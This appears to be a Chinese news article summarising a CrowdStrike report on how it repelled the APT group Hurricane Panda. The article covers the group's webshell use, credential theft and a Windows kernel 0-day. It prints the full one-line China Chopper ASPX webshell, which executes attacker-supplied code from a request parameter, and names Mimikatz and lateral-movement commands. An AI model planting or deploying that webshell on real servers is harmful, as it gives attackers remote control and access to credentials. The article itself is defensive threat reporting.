CrowdStrike：我们挡住了中国黑客组织飓风熊猫

通常我们看到黑客入侵事件的报道大多为：某公司被黑客入侵了，检测到一未知行为，事件响应小组已介入调查和处理，客户和公众确定入侵行为结束，公司解除安全警报……你是不是也这样认为黑客入侵都是偶发性、短暂性的呢？

而APT（高级可持续性威胁）攻击并不是这样——真正有目的性的攻击者并不会考虑战斗或者使命什么时候结束，直至被发现或被踢出网络的那一刻才算暂时中止。他们的工作就是入侵到某网站，然后潜伏在其中。这其中的艰苦和所面对的困难只有他们自己知道，他们通常会连续工作几周甚至几个月，直至成功入侵。当然功夫不负有心人，大多数情况下都能成功。成功入侵之后，他们便会继续他们的主要工作，窃取敏感数据、使受害者宕机等。

论持久战

成功入侵的心诀就是持之以恒。攻击者需要做好长久作战的准备，要知道攻击目标都不是傻子，他们可能很快就发现了你的攻击行为，并给予了还击，这个时候你就要另辟蹊径，重新寻找攻击突破口了。有时一次成功的入侵会循环往复好多次重复操作。

还有一种比较高效的还击方法——损毁攻击者的间谍情报技术和工具，这样既阻碍了入侵，还浪费了攻击者大量的时间和精力，一石二鸟有没有？

好了，废话有点多，该进入正题了……

背景

CrowdStrike公司官方博客上发表了一篇文章，宣称成功阻挡住了中国黑客组织飓风熊猫（HURRICANE PANDA）的网络攻击。CrowdStrike从2013年就开始调查飓风熊猫，并一直在与之斗争。

CrowdStrike对飓风熊猫的攻击决心给出了如下评价：

they are like a dog with a bone.（小编愚昧，比喻太过深奥，还是不翻为好……）

与飓风熊猫之间的攻防战

2014年4月底，一家遭到飓风熊猫攻击的公司向CrowdStrike公司寻求了帮助。CrowdStrike建议它立即在主机基础设施上部署他们的端点安全技术CrowdStrike Falcon。该技术可以让他们清楚的看到攻击者的行为：执行的命令、窃取的证书等，这样就大大节约了寻找修复方法的时间。所以这家公司在6月初的时候就完全修复了被攻击者利用的所有漏洞，也就是说飓风熊猫被成功踢了出去。

然而HURRICANE PANDA的战斗并没有终止……

随之而来的是，重新发起攻击的飓风熊猫选择使用China Chopper webshell（中国菜刀）——它是一个微小、易被忽略且只有70字节的文本文件，里面包含一个‘eval()’命令，会为攻击者提供完整的命令执行权限和文件上传/下载能力。该脚本可以通过SQL注入或者WebDAV 漏洞上传至web服务器。

<%@Page Language="Jscript"%> <%eval(Request.Item["password"],"unsafe"); %>

一旦该脚本成功植入进受害者web服务器，攻击者会立即启动证书窃取工具（如 Mimikatz）。如果攻击者足够幸运，恰好在管理员登录web服务器的时候发动攻击的话，便可窃取到域名管理员证书，然后在webshell 终端执行‘net use’和‘wmic’命令，之后便可畅游受害者网络了。

而CrowdStrike很快检测并阻止了木马后门China Chopper webshell。

在为期4个月的尝试无果之后，飓风熊猫再次提升了他们的间谍情报技术并利用了Windows内核0day漏洞 (CVE-2014-4113)，而且即便借助于0day漏洞也没能绝地反击，经过无数次攻击尝试失败后，HURRICANE PANDA终于放弃了。

* 参考来源blog.crowdstrike.com，